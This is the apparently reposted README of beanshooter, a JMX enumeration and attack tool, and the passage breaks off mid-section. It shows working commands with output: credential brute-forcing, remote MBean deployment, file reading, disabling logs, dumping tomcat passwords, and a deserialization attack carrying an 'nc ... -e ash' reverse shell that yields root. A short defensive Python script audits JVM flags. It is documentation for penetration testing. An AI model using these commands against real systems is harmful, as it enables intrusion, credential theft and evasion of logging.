JMX Enumeration and Attacking Tool

Author: Sec-Labs | Published:

Project URL

https://github.com/qtc-de/beanshooter

beanshooter

beanshooter is a JMX enumeration and attacking tool that helps to identify common vulnerabilities on JMX endpoints.

Installation

beanshooter is a Maven project and installation should be straightforward. With maven installed, just execute the following commands to create an executable .jar file:

[qtc@devbox ~]$ git clone https://github.com/qtc-de/beanshooter
[qtc@devbox ~]$ cd beanshooter
[qtc@devbox ~]$ mvn package

You can also use the pre-built packages that are created for each release. Pre-built packages for the development branch are created automatically and can be found on the GitHub Actions page. A pre-built docker image for running beanshooter is also available.

beanshooter does not include ysoserial as a dependency. To enable ysoserial support, you need to specify the path to ysoserial.jar as an additional argument (e.g. --yso /opt/ysoserial.jar), or change the default path in the beanshooter configuration file before building the project.

beanshooter supports autocompletion for bash. To take advantage of autocompletion, you need to have the completion-helpers project installed. If set up correctly, just copy the completion script to your ~/.bash_completion.d folder to enable autocompletion:

[qtc@devbox ~]$ cp resources/bash_completion.d/beanshooter ~/bash_completion.d/

Supported Operations

The different beanshooter operations can be divided into two groups: basic operations and MBean operations. Basic operations are used to perform general operations on a JMX endpoint, while MBean operations interact with a specific MBean. For more details, check the usage examples in the following sections.

[qtc@devbox ~]$ beanshooter -h
usage: beanshooter [-h]   ...

beanshooter v3.0.0 - a JMX enumeration and attacking tool

positional arguments:

 Basic Operations
    attr                 set or get MBean attributes
    brute                bruteforce JMX credentials
    deploy               deploys the specified MBean on the JMX server
    enum                 enumerate the JMX service for common vulnerabilities
    info                 display method and attribute information on an MBean
    invoke               invoke the specified method on the specified MBean
    list                 list available MBEans on the remote MBean server
    serial               perform a deserialization attack
    stager               start a stager server to deliver MBeans
    undeploy             undeploys the specified MBEAN from the JMX server

 MBean Operations
    diagnostic           Diagnostic Command MBean
    hotspot              HotSpot Diagnostic MBean
    mlet                 default JMX bean that can be used to load additional beans dynamically
    recorder             jfr Flight Recorder MBean
    tomcat               tomcat MemoryUserDatabaseMBean used for user management
    tonka                general purpose bean for executing commands and uploading or download files

named arguments:
  -h, --help             show this help message and exit

Basic Operations

Basic operations are general-purpose operations that can be performed on a JMX service. These are usually operations that do not target a specific MBean, or that target an MBean for which beanshooter has no built-in support.

Attr

The attr action can be used to get or set attributes of the specified MBean. To obtain the available attributes, the info action should be used:

[qtc@devbox ~]$ beanshooter info 172.17.0.2 9010
...
[+] MBean Class: sun.management.MemoryImpl
[+] ObjectName: java.lang:type=Memory
[+]
[+]     Attributes:
[+]         Verbose (type: boolean , writable: true)
[+]         ObjectPendingFinalizationCount (type: int , writable: false)
[+]         HeapMemoryUsage (type: javax.management.openmbean.CompositeData , writable: false)
[+]         NonHeapMemoryUsage (type: javax.management.openmbean.CompositeData , writable: false)
[+]         ObjectName (type: javax.management.ObjectName , writable: false)
[+]
[+]     Operations:
[+]         void gc()

When only the attribute name is specified, beanshooter gets and displays the current attribute value:

[qtc@devbox ~]$ beanshooter attr 172.17.0.2 9010 java.lang:type=Memory Verbose
false

When an additional value is specified, beanshooter attempts to set the corresponding attribute. For attributes with a type other than String, the attribute type needs to be specified using the --type option:

[qtc@devbox ~]$ beanshooter attr 172.17.0.2 9010 java.lang:type=Memory Verbose true --type boolean
[qtc@devbox ~]$ beanshooter attr 172.17.0.2 9010 java.lang:type=Memory Verbose
true

Brute

The brute action performs a bruteforce attack on a password-protected JMX service. When run without additional optional arguments, beanshooter uses a built-in wordlist containing some common username-password combinations. For more dedicated attacks, you should use the --username-file and --password-file options to specify more exhaustive wordlists.

[qtc@devbox ~]$ beanshooter brute 172.17.0.2 1090
[+] Reading wordlists for the brute action.
[+]     Reading credentials from internal wordlist.
[+]
[+] Starting bruteforce attack with 10 credentials.
[+]
[+]     Found valid credentials: admin:admin
[+]     [10 / 10] [########################################] 100%
[+]
[+] done.

Deploy

The deploy action can be used to deploy an MBean on the JMX service. This action should be used to deploy MBeans that do not have default support (unlike, for example, the TonkaBean). MBeans with default support should be deployed via the corresponding MBean operation.

When the MBean you want to deploy is already known to the JMX service, you only need to specify the name of the class implementing the MBean and the desired ObjectName:

[qtc@devbox ~]$ beanshooter deploy 172.17.0.2 9010 javax.management.monitor.StringMonitor qtc.test:type=Monitor
[+] Starting MBean deployment.
[+]
[+]     Deplyoing MBean: StringMonitor
[+]     MBean with object name qtc.test:type=Monitor was successfully deployed.

When the MBean class is not known to the JMX service, you can use the --jar-file and --stager-url options to provide the implementation:

[qtc@devbox ~]$ beanshooter deploy 172.17.0.2 9010 non.existing.example.ExampleBean qtc.test:type=Example --jar-file exampleBean.jar --stager-url http://172.17.0.1:8000
[+] Starting MBean deployment.
[+]
[+]     Deplyoing MBean: ExampleBean
[+]
[+]         MBean class is not known to the server.
[+]         Starting MBean deployment.
[+]
[+]             Deplyoing MBean: MLet
[+]             MBean with object name DefaultDomain:type=MLet was successfully deployed.
[+]
[+]         Loading MBean from http://172.17.0.1:8000
[+]
[+]             Creating HTTP server on: 172.17.0.1:8000
[+]                 Creating MLetHandler for endpoint: /
[+]                 Creating JarHandler for endpoint: /c65c3cdc908348d8bd9a22b8a2bf8be3
[+]                 Starting HTTP server... 
[+]                 
[+]             Incoming request from: iinsecure.example
[+]             Requested resource: /
[+]             Sending mlet:
[+]
[+]                 Class:     non.existing.example.ExampleBean
[+]                 Archive:   c65c3cdc908348d8bd9a22b8a2bf8be3
[+]                 Object:    qtc.test:type=Example
[+]                 Codebase:  http://172.17.0.1:8000
[+]
[+]             Incoming request from: iinsecure.example
[+]             Requested resource: /c65c3cdc908348d8bd9a22b8a2bf8be3
[+]             Sending jar file with md5sum: c4d8f40d1c1ac7f3cf7582092802a484
[+]
[+]     MBean with object name qtc.test:type=Example was successfully deployed.

Enum

The enum action enumerates some configuration details of the JMX endpoint. It always checks whether the JMX endpoint requires authentication and whether it allows pre-authenticated arbitrary deserialization.

[qtc@devbox ~]$ beanshooter enum 172.17.0.2 1090
[+] Checking for unauthorized access:
[+]
[+]     - Remote MBean server requires authentication.
[+]       Vulnerability Status: Non Vulnerable
[+]
[+] Checking pre-auth deserialization behavior:
[+]
[+]     - Remote MBeanServer accepted the payload class.
[+]       Configuration Status: Non Default

When no authentication is required or valid credentials were specified, the enum action also attempts to enumerate some further information from the JMX endpoint. This includes a list of non-default MBeans and, for example, the user accounts registered on an Apache tomcat server:

[qtc@devbox ~]$ beanshooter enum 172.17.0.2 1090
[+] Checking for unauthorized access:
[+]
[+]     - Remote MBean server does not require authentication.
[+]       Vulnerability Status: Vulnerable
[+]
[+] Checking pre-auth deserialization behavior:
[+]
[+]     - Remote MBeanServer rejected the payload class.
[+]       Vulnerability Status: Non Vulnerable
[+]
[+] Checking available MBeans:
[+]
[+]     - 57 MBeans are currently registred on the MBean server.
[+]       Listing 39 non default MBeans:
[+]       - org.apache.tomcat.util.modeler.BaseModelMBean (Catalina:type=Valve,host=localhost,name=AccessLogValve)
[+]       - org.apache.tomcat.util.modeler.BaseModelMBean (Catalina:type=GlobalRequestProcessor,name="http-nio-8080")
[...]
[+]
[+] Enumerating tomcat users:
[+]
[+]     - Listing 3 tomcat users:
[+]
[+]         ----------------------------------------
[+]         Username:  manager
[+]         Password:  P@55w0rD#
[+]         Roles:
[+]                Users:type=Role,rolename="manager-gui",database=UserDatabase
[+]                Users:type=Role,rolename="manager-script",database=UserDatabase
[+]                Users:type=Role,rolename="manager-jmx",database=UserDatabase
[+]                Users:type=Role,rolename="manager-status",database=UserDatabase
[+]
[+]         ----------------------------------------
[+]         Username:  admin
[+]         Password:  s3cr3T!$
[+]         Roles:
[+]                Users:type=Role,rolename="admin-gui",database=UserDatabase
[+]                Users:type=Role,rolename="admin-script",database=UserDatabase
[...]

When invoking the enum action on a SASL-protected endpoint, beanshooter attempts to enumerate the SASL profile configured for the server. This is only possible to a certain degree, and the server's TLS configuration cannot be enumerated. If the SASL profile identified by beanshooter does not work, you should always retry with and without the --ssl option:

[qtc@devbox ~]$ beanshooter enum 172.17.0.2 4447 --jmxmp
[+] Checking servers SASL configuration:
[+]
[+]     - Remote JMXMP server uses SASL/DIGEST-MD5 SASL profile.
[+]       Credentials are requried and the following hostname must be used: iinsecure.example
[+]       Notice: TLS setting cannot be enumerated and --ssl may be required.
[+]       Vulnerability Status: Non Vulnerable
...

Info

The info action can be used to obtain method and attribute information on the MBeans available on the MBean server. When invoked without additional arguments, method and attribute information for all available MBeans is printed. When an additional ObjectName is specified, only the method and attribute information for the specified MBean is printed:

[qtc@devbox ~]$ beanshooter info 172.17.0.2 9010 java.lang:type=Memory
[+] MBean Class: sun.management.MemoryImpl
[+] ObjectName: java.lang:type=Memory
[+]
[+]     Attributes:
[+]         Verbose (type: boolean , writable: true)
[+]         ObjectPendingFinalizationCount (type: int , writable: false)
[+]         HeapMemoryUsage (type: javax.management.openmbean.CompositeData , writable: false)
[+]         NonHeapMemoryUsage (type: javax.management.openmbean.CompositeData , writable: false)
[+]         ObjectName (type: javax.management.ObjectName , writable: false)
[+]
[+]     Operations:
[+]         void gc()

Invoke

The invoke action can be used to invoke arbitrary methods on MBeans deployed on the JMX endpoint. Apart from the endpoint, the action requires the ObjectName of the target MBean and the signature of the method you want to invoke. If the specified method requires arguments, these need to be specified as well. The following listing shows an example of an argumentless method invocation, where the vmVersion() method of the DiagnosticCommand MBean is invoked:

[qtc@devbox ~]$ beanshooter invoke 172.17.0.2 1090 com.sun.management:type=DiagnosticCommand --signature 'vmVersion()'
OpenJDK 64-Bit Server VM version 11.0.14.1+1
JDK 11.0.14.1

When invoking methods that require arguments, the arguments specified to beanshooter are evaluated as Java code. Simple argument types like integers or strings can be passed by specifying the corresponding value. Complex argument types can be constructed as in Java (e.g. 'new java.util.HashMap()'). The following listing shows an example where the help(String[] args) method is invoked on the DiagnosticCommand MBean:

[qtc@devbox ~]$ beanshooter invoke 172.17.0.2 1090 com.sun.management:type=DiagnosticCommand --signature 'help(String[] args)' 'new String[] { "Compiler.directives_add" }'
Compiler.directives_add
Add compiler directives from file.

Impact: Low

Permission: java.lang.management.ManagementPermission(monitor)

Syntax : Compiler.directives_add  <filename>

Arguments:
    filename :  Name of the directives file (STRING, no default value)

For more complex argument types that require some initialization, you can use beanshooter's PluginSystem and define a custom class implementing the IArgumentProvider interface.

Jolokia

As described in beanshooter's Jolokia documentation, almost all beanshooter operations can be used with the --jolokia switch to target Jolokia-based JMX endpoints. Apart from this general support for the Jolokia JMX adapter, beanshooter also supports a dedicated jolokia action. This action can be used to force an outbound connection from a Jolokia agent running in proxy mode:

[qtc@devbox ~]$ beanshooter jolokia 172.17.0.2 8080 172.17.0.1 4444 --username manager --password admin --ldap
[+] Attempting to trigger outboud connection to 172.17.0.1:4444
[+] Using proxy service URL: service:jmx:Rmi:///jndi/ldap://172.17.0.1:4444/beanshooter
...

[qtc@devbox ~]$ nc -vlp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 172.17.0.2.
Ncat: Connection from 172.17.0.2:60052.
0

The same result can be achieved by invoking a regular beanshooter action like list together with the --jolokia-proxy service:jmx:... option. The jolokia action was added as a shortcut so that you do not need to remember the JNDI syntax. When using the jolokia action, the --jolokia option is assumed by default.

List

The list action prints a list of all MBeans registered on the remote JMX service:

[qtc@devbox ~]$ beanshooter list 172.17.0.2 9010
[+] Available MBeans:
[+]
[+]     - sun.management.MemoryManagerImpl (java.lang:name=Metaspace Manager,type=MemoryManager)
[+]     - sun.management.MemoryPoolImpl (java.lang:name=Metaspace,type=MemoryPool)
[+]     - javax.management.MBeanServerDelegate (JMImplementation:type=MBeanServerDelegate)
[...]

Serial

The serial action can be used to perform deserialization attacks on the JMX endpoint. By default, the action attempts an authenticated deserialization attack. For this, the targeted JMX service needs to allow unauthenticated access, or you need valid credentials:

[qtc@devbox ~]$ beanshooter serial 172.17.0.2 1090 CommonsCollections6 "nc 172.17.0.1 4444 -e ash" --username admin --password admin
[+] Attemting deserialization attack on JMX endpoint.
[+]
[+]     Creating ysoserial payload... done.
[+]     MBeanServer attempted to deserialize the DeserializationCanary class.
[+]     Deserialization attack was probably successful.

[qtc@devbox ~]$ nc -vlp 4444
[...]
id
uid=0(root) gid=0(root) groups=0(root)

JMX services can also be vulnerable to pre-authentication deserialization attacks. To abuse this, you can use the --preauth switch:

[qtc@devbox ~]$ beanshooter serial 172.17.0.2 1090 CommonsCollections6 "nc 172.17.0.1 4444 -e ash" --preauth
[+] Attemting deserialization attack on JMX endpoint.
[+]
[+]     Creating ysoserial payload... done.
[+]     MBeanServer attempted to deserialize the DeserializationCanary class.
[+]     Deserialization attack was probably successful.

[qtc@devbox ~]$ nc -vlp 4444
[...]
id
uid=0(root) gid=0(root) groups=0(root)

Against JMXMP endpoints, pre-authentication deserialization is usually possible. Unfortunately, it cannot be enumerated correctly during the enum action. If you encounter a JMXMP endpoint, you should just give it a try.

Stager

The stager action starts a stager server that can be used to deliver MBeans. When using beanshooter's deploy action, a stager server is usually created automatically for MBean delivery. However, sometimes a standalone server is required. When using the stager action, you can specify the name of a built-in MBean to deliver (e.g. tonka) or the keyword custom. If custom is specified, the --class-name, --object-name and --jar-file options are required.

[qtc@devbox ~]$ beanshooter tonka deploy 172.17.0.2 9010 --stager-url http://172.17.0.1:8888 --no-stager
[qtc@devbox ~]$ beanshooter stager 172.17.0.1 8888 tonka
[+] Creating HTTP server on: 172.17.0.1:8888
[+] Creating MLetHandler for endpoint: /
[+] Creating JarHandler for endpoint: /93691b8bae4143f087f7a3123641b20d
[+] Starting HTTP server.
[+] 
[+] Press Enter to stop listening.
[+]
[+] Incoming request from: iinsecure.example
[+] Requested resource: /
[+] Sending mlet:
[+]
[+]     Class:     de.qtc.beanshooter.tonkabean.TonkaBean
[+]     Archive:   93691b8bae4143f087f7a3123641b20d
[+]     Object:    MLetTonkaBean:name=TonkaBean,id=1
[+]     Codebase:  http://172.17.0.1:8888
[+]
[+] Incoming request from: iinsecure.example
[+] Requested resource: /93691b8bae4143f087f7a3123641b20d
[+] Sending jar file with md5sum: 6568ffb2934cb978dbd141848b8b128a

Undeploy

The undeploy action removes the MBean with the specified ObjectName from the JMX service:

[qtc@devbox ~]$ beanshooter undeploy 172.17.0.2 9010 qtc.test:type=Example 
[+] Removing MBean with ObjectName qtc.test:type=Example from the MBeanServer.
[+] MBean was successfully removed.

MBean Operations

In contrast to basic operations, which target general functionality exposed by the JMX endpoint, MBean operations target a specific MBean. For each supported MBean, beanshooter provides a separate subparser containing the available operations and options for the corresponding MBean. The following listing shows an example for the mlet MBean and its associated subparser:

[qtc@devbox ~]$ beanshooter mlet -h
usage: beanshooter mlet [-h]   ...

positional arguments:

    load                 load a new MBean from the specified URL
    attr                 set or get MBean attributes
    deploy               deploys the specified MBean on the JMX server
    info                 print server information about the MBean
    invoke               invoke the specified method on the MBean
    stats                print local information about the MBean
    status               checks whether the MBean is registered
    undeploy             undeploys the specified MBEAN from the JMX server

named arguments:
  -h, --help             show this help message and exit

Generic MBean Operations

Some beanshooter operations are available for every MBean and are demonstrated in this section. These generic MBean operations usually mirror the functionality of the basic operations, but do not require an ObjectName to be specified.

Generic Attr

This action is the same as the attr action from the basic operations. However, specifying an ObjectName is no longer required, as it is implied by the specified MBean.

[qtc@devbox ~]$ beanshooter tomcat attr 172.17.0.2 1090 users
Users:type=User,username="manager",database=UserDatabase
Users:type=User,username="admin",database=UserDatabase
Users:type=User,username="status",database=UserDatabase

Generic Deploy

This action basically works like the deploy action from the basic operations. However, since the class name, the ObjectName and the implementing jar file are already associated with the specified MBean, you only need to specify the --stager-url option for this action (assuming a built-in jar file is available):

[qtc@devbox ~]$ beanshooter tonka deploy 172.17.0.2 9010 --stager-url http://172.17.0.1:8000
[+] Starting MBean deployment.
[+]
[+]     Deplyoing MBean: TonkaBean
[+]
[+]         MBean class is not known to the server.
[+]         Loading MBean from http://172.17.0.1:8000
[+]
[+]             Creating HTTP server on: 172.17.0.1:8000
[+]                 Creating MLetHandler for endpoint: /
[+]                 Creating JarHandler for endpoint: /440441bf8c794d40a83caf1e34cd9993
[+]                 Starting HTTP server... 
[+]                 
[+]             Incoming request from: iinsecure.example
[+]             Requested resource: /
[+]             Sending mlet:
[+]
[+]                 Class:     de.qtc.beanshooter.tonkabean.TonkaBean
[+]                 Archive:   440441bf8c794d40a83caf1e34cd9993
[+]                 Object:    MLetTonkaBean:name=TonkaBean,id=1
[+]                 Codebase:  http://172.17.0.1:8000
[+]
[+]             Incoming request from: iinsecure.example
[+]             Requested resource: /440441bf8c794d40a83caf1e34cd9993
[+]             Sending jar file with md5sum: 55a843002e13f763137d115ce4caf705
[+]
[+]     MBean with object name MLetTonkaBean:name=TonkaBean,id=1 was successfully deployed

Generic Export

Sometimes it is not possible to use beanshooter's stager server to provide the MBean implementation. A common scenario is that outbound connections to your local machine are blocked. In these situations you may want to load the MBean from a different location, e.g. an SMB service within the internal network where you have write access.

The export action exports the jar file implementing the specified MBean together with the corresponding MLet HTML document required to load the MBean via MLet. Assuming you want to serve the TonkaBean from an SMB service listening on 10.10.10.5, you can use the following command:

[qtc@devbox ~]$ beanshooter tonka export --export-dir export --stager-url file:////10.10.10.5/share/
[+] Exporting MBean jar file: export/tonka-bean-3.0.0-jar-with-dependencies.jar
[+] Exporting MLet HTML file to: export/index.html
[+]     Class:     de.qtc.beanshooter.tonkabean.TonkaBean
[+]     Archive:   tonka-bean-3.0.0-jar-with-dependencies.jar
[+]     Object:    MLetTonkaBean:name=TonkaBean,id=1
[+]     Codebase:  file:////10.10.10.5/share/

Afterwards, you can upload the exported jar and index.html files to the SMB service and use beanshooter's deploy action with the option --stager-url file:////10.10.10.5/share/index.html.

Generic Info

The info action lists method and attribute information for the specified MBean:

[qtc@devbox ~]$ beanshooter tomcat info 172.17.0.2 1090
[+] MBean Class: org.apache.catalina.mbeans.MemoryUserDatabaseMBean
[+] ObjectName: Users:type=UserDatabase,database=UserDatabase
[+]
[+]     Attributes:
[+]         modelerType (type: java.lang.String , writable: false)
[+]         readonly (type: boolean , writable: false)
[+]         roles (type: [Ljava.lang.String; , writable: false)
[+]         groups (type: [Ljava.lang.String; , writable: false)
[+]         users (type: [Ljava.lang.String; , writable: false)
[+]         pathname (type: java.lang.String , writable: true)
[+]         writable (type: null , writable: false)
[+]
[+]     Operations:
[+]         java.lang.String findGroup(java.lang.String groupname)
[+]         java.lang.String createUser(java.lang.String username, java.lang.String password, java.lang.String fullName)
[+]         void removeGroup(java.lang.String groupname)
[+]         void removeUser(java.lang.String username)
[+]         void save()
[+]         java.lang.String findRole(java.lang.String rolename)
[+]         void removeRole(java.lang.String rolename)
[+]         java.lang.String createGroup(java.lang.String groupname, java.lang.String description)
[+]         java.lang.String findUser(java.lang.String username)
[+]         java.lang.String createRole(java.lang.String rolename, java.lang.String description)

Generic Invoke

The invoke action can be used to invoke arbitrary methods on the specified MBean:

[qtc@devbox ~]$ beanshooter tomcat invoke 172.17.0.2 1090 --signature 'findUser(String username)' admin
Users:type=User,username="admin",database=UserDatabase

Generic Stats

The stats action lists some general information about the specified MBean. This is information that beanshooter stores locally about the corresponding MBean, so it does not require server interaction.

[qtc@devbox ~]$ beanshooter tonka stats
[+] MBean: tonka
[+]     Object Name:     MLetTonkaBean:name=TonkaBean,id=1
[+]     Class Name:      de.qtc.beanshooter.tonkabean.TonkaBean
[+]     Jar File:        available (tonka-bean-3.0.0-jar-with-dependencies.jar)

The Jar File entry indicates whether the implementation of the corresponding MBean is built into beanshooter. If not overwritten using the --jar-file option, this jar file is used during deployment. Currently, the TonkaBean is the only MBean with an available jar file.

Generic Status

The status action checks whether the corresponding MBean is already available on the JMX service:

[qtc@devbox ~]$ beanshooter tonka status 172.17.0.2 9010
[+] MBean Status: not deployed

Generic Undeploy

The undeploy action removes the specified MBean from the remote JMX service:

[qtc@devbox ~]$ beanshooter tonka undeploy 172.17.0.2 9010 
[+] Removing MBean with ObjectName MLetTonkaBean:name=TonkaBean,id=1 from the MBeanServer.
[+] MBean was successfully removed.

Diagnostic

The DiagnosticCommand MBean is a useful MBean that is usually deployed on JMX servers by default. It implements several different methods that are interesting from an offensive perspective. Some of them are implemented as beanshooter operations; the others can, of course, be invoked manually.

Diagnostic Read

The read action can be used to read text files on the MBean server. The action uses the addCompilerDirective method to raise an exception containing the contents of the specified text file:

[qtc@devbox ~]$ beanshooter diagnostic read 172.17.0.2 1090 /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
...

This technique was originally implemented by @TheLaluka in the jolokia-exploitation-toolkit.

Diagnostic Load

The load action can be used to load a shared library from the file system of the JMX server:

[qtc@devbox ~]$ beanshooter diagnostic load 172.17.0.2 1090 /lib/x86_64-linux-gnu/libc.so.6
[+] The server complained about the missing function Agent_OnAttach
[+] The specified library was loaded succesfully.

Diagnostic Logfile

The logfile action can be used to change the log file location of the JVM:

[qtc@devbox ~]$ beanshooter diagnostic logfile 172.17.0.2 1090 /tmp/test.log
[+] Logfile path was successfully set to /tmp/test.log

Diagnostic Nolog

The nolog action can be used to disable logging (useful for closing log file handles):

[qtc@devbox ~]$ beanshooter diagnostic nolog 172.17.0.2 1090
[+] Logging was disabled successfully.

Diagnostic Cmdline

The cmdline action prints the command line the JVM was started with:

[qtc@devbox ~]$ beanshooter diagnostic cmdline 172.17.0.2 1090
VM Arguments:
jvm_args: --add-opens=java.base/java.lang=ALL-UNNAMED --add-opens=java.base/java.io=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED --add-opens=java.base/java.util.concurrent=ALL-UNNAMED --add-opens=java.rmi/sun.rmi.transport=ALL-UNNAMED -Djava.util.logging.config.file=/usr/local/tomcat/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Dignore.endorsed.dirs= -Dcatalina.base=/usr/local/tomcat -Dcatalina.home=/usr/local/tomcat -Djava.io.tmpdir=/usr/local/tomcat/temp -Djava.rmi.server.hostname=iinsecure.example -Djavax.net.ssl.keyStorePassword=password -Djavax.net.ssl.keyStore=/opt/store.p12 -Djavax.net.ssl.keyStoreType=pkcs12 -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.local.only=false -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.port=1090 -Dcom.sun.management.jmxremote.rmi.port=1099
java_command: org.apache.catalina.startup.Bootstrap start
java_class_path (initial): /usr/local/tomcat/bin/bootstrap.jar:/usr/local/tomcat/bin/tomcat-juli.jar
Launcher Type: SUN_STANDARD
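The jvm_args line above is also what a defender should look at when assessing such a host: the com.sun.management.jmxremote.* properties decide whether the remote agent requires credentials, uses TLS and binds beyond loopback. As an added example (not part of beanshooter), the following Python script audits a JVM command line for these settings; the sample input is constructed from the flags shown above.

```python
import shlex
from dataclasses import dataclass

PREFIX = "com.sun.management.jmxremote"

# Property suffix, value that weakens the endpoint, and why it matters.
# Unspecified properties keep the JDK defaults (authenticate=true, ssl=true,
# local.only=true), so only explicit weak values are reported.
WEAK_SETTINGS = [
    ("authenticate", "false", "remote JMX accepts connections without credentials"),
    ("ssl", "false", "JMX traffic and credentials are sent in clear text"),
    ("local.only", "false", "the agent binds to all interfaces, not only loopback"),
]

# Constructed sample, reduced to the relevant flags from the cmdline output above.
SAMPLE_JVM_ARGS = (
    "-Djava.rmi.server.hostname=iinsecure.example "
    "-Djavax.net.ssl.keyStorePassword=password "
    "-Dcom.sun.management.jmxremote "
    "-Dcom.sun.management.jmxremote.ssl=false "
    "-Dcom.sun.management.jmxremote.local.only=false "
    "-Dcom.sun.management.jmxremote.authenticate=false "
    "-Dcom.sun.management.jmxremote.port=1090 "
    "-Dcom.sun.management.jmxremote.rmi.port=1099"
)


@dataclass
class Finding:
    prop: str
    value: str
    reason: str


def parse_system_properties(cmdline: str) -> dict:
    """Return the -Dkey=value system properties of a JVM command line as a dict.

    A bare -Dkey (no '=') is stored with an empty value, which is how the JVM
    treats e.g. -Dcom.sun.management.jmxremote.
    """
    props = {}
    for tok in shlex.split(cmdline):
        if tok.startswith("-D"):
            key, _, value = tok[2:].partition("=")
            props[key] = value
    return props


def audit_jmx(cmdline: str) -> list:
    """Report remote-JMX settings on the command line that weaken the endpoint."""
    props = parse_system_properties(cmdline)
    findings = []
    port = props.get(f"{PREFIX}.port")
    if port is None:
        # Without a port the agent is local-only (attach API), not a network service.
        return findings
    findings.append(Finding(f"{PREFIX}.port", port, "remote JMX agent listening on this port"))
    for suffix, weak_value, reason in WEAK_SETTINGS:
        key = f"{PREFIX}.{suffix}"
        if props.get(key) == weak_value:
            findings.append(Finding(key, weak_value, reason))
    # Secrets passed as -D properties are visible to every local user via ps.
    if "javax.net.ssl.keyStorePassword" in props:
        findings.append(Finding("javax.net.ssl.keyStorePassword", "<redacted>",
                                "keystore password exposed in process arguments"))
    return findings


def format_report(cmdline: str) -> str:
    findings = audit_jmx(cmdline)
    if not findings:
        return "no remote JMX agent or no weak settings found"
    return "\n".join(f"[!] {f.prop}={f.value}: {f.reason}" for f in findings)


if __name__ == "__main__":
    print(format_report(SAMPLE_JVM_ARGS))
```

The same function can be fed the output of `ps -o args= -p <pid>` on the host itself, which avoids querying the JMX endpoint at all.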

Diagnostic Props

The props action prints the list of system properties:

[qtc@devbox ~]$ beanshooter diagnostic props 172.17.0.2 1090
#Mon Jul 25 19:17:52 UTC 2022
com.sun.management.jmxremote.rmi.port=1099
awt.toolkit=sun.awt.X11.XToolkit
java.specification.version=11
sun.cpu.isalist=
...

HotSpot

The HotSpotDiagnosticMXBean provides an interface for managing the HotSpot virtual machine and supports some methods that are useful from an offensive perspective.

HotSpot Dump

The dump action creates a heap dump and saves it to an arbitrary location on the application server. The only requirement is that the dump is saved with the .hprof extension:

[qtc@devbox ~]$ beanshooter hotspot dump 172.17.0.2 1090 /tmp/dump.hprof
[+] Heapdump file /tmp/dump.hprof was created successfully.

HotSpot List

The list action prints a list of the available diagnostic options and their associated values:

[qtc@devbox ~]$ beanshooter hotspot list 172.17.0.2 1090
[+] HeapDumpBeforeFullGC (value = false, writable = true)
[+] HeapDumpAfterFullGC (value = false, writable = true)
[+] HeapDumpOnOutOfMemoryError (value = false, writable = true)
[+] HeapDumpPath (value = , writable = true)
...

HotSpot Get

The get action obtains the value of the specified option:

[qtc@devbox ~]$ beanshooter hotspot get 172.17.0.2 1090 HeapDumpBeforeFullGC
[+] Name: HeapDumpBeforeFullGC
[+] Value: false
[+] Writable: true

HotSpot Set

The set action sets the value of the specified option:

[qtc@devbox ~]$ beanshooter hotspot set 172.17.0.2 1090 HeapDumpBeforeFullGC true
[+] Option was set successfully.
[qtc@devbox ~]$ beanshooter hotspot get 172.17.0.2 1090 HeapDumpBeforeFullGC
[+] Name: HeapDumpBeforeFullGC
[+] Value: true
[+] Writable: true

MLet


The MLet MBean is a well-known MBean that can be used to load additional MBeans over the network. It is used implicitly by beanshooter's deploy action, but can also be invoked manually using the mlet action.

MLet Load

Currently, the only implemented MLet method is the load action, which can be used to load an MBean class from a user-specified URL:

[qtc@devbox ~]$ beanshooter mlet load 172.17.0.2 9010 tonka http://172.17.0.1:8000
[+] Starting MBean deployment.
[+]
[+]     Deplyoing MBean: MLet
[+]     MBean with object name DefaultDomain:type=MLet was successfully deployed.
[+]
[+] Loading MBean from http://172.17.0.1:8000
[+]
[+]     Creating HTTP server on: 172.17.0.1:8000
[+]         Creating MLetHandler for endpoint: /
[+]         Creating JarHandler for endpoint: /3584de270132420aaf0812366bc46035
[+]         Starting HTTP server... 
[+]         
[+]     Incoming request from: iinsecure.example
[+]     Requested resource: /
[+]     Sending mlet:
[+]
[+]         Class:     de.qtc.beanshooter.tonkabean.TonkaBean
[+]         Archive:   3584de270132420aaf0812366bc46035
[+]         Object:    MLetTonkaBean:name=TonkaBean,id=1
[+]         Codebase:  http://172.17.0.1:8000
[+]
[+]     Incoming request from: iinsecure.example
[+]     Requested resource: /3584de270132420aaf0812366bc46035
[+]     Sending jar file with md5sum: b2f7040f7d8f2d1f40b205d631ff7356
[+]
[+] MBean was loaded successfully.

The example above demonstrates how to load the TonkaBean manually using the mlet action. If you want to load a custom MBean instead, you need to specify the keyword custom instead of tonka and provide the --class-name, --object-name and --jar-file options:

[qtc@devbox ~]$ beanshooter mlet load 172.17.0.2 9010 custom http://172.17.0.1:8000 --class-name de.qtc.beanshooter.ExampleBean --object-name ExampleBean:name=ExampleBean,id=1 --jar-file www/example.jar
[+] Starting MBean deployment.
[+] ...
[+] MBean was loaded successfully.

Recorder

The FlightRecorderMXBean provides an interface for managing the flight recorder and supports some methods that are interesting from an offensive perspective.

Recorder New

The new action starts a new recording. The returned recording ID can be used as the target of the other actions:

[qtc@devbox ~]$ beanshooter recorder new 172.17.0.2 1090
[+] Requesting new recording on the MBeanServer.
[+] New recording created successfully with ID: 1

Recorder Start

The start action starts an already existing recording and expects the recording ID as an additional argument:

[qtc@devbox ~]$ beanshooter recorder start 172.17.0.2 1090 1
[+] Recording with ID 1 started successfully.

Recorder Dump

While a recording is active, its content can be dumped using the dump action. This stores the recording information in a dump file on the JMX server:

[qtc@devbox ~]$ beanshooter recorder dump 172.17.0.2 1090 1 /tmp/dump.dat
[+] Recording with ID 1 was successfully dumped to /tmp/dump.dat

Recorder Stop

The stop action can be used to stop a recording:

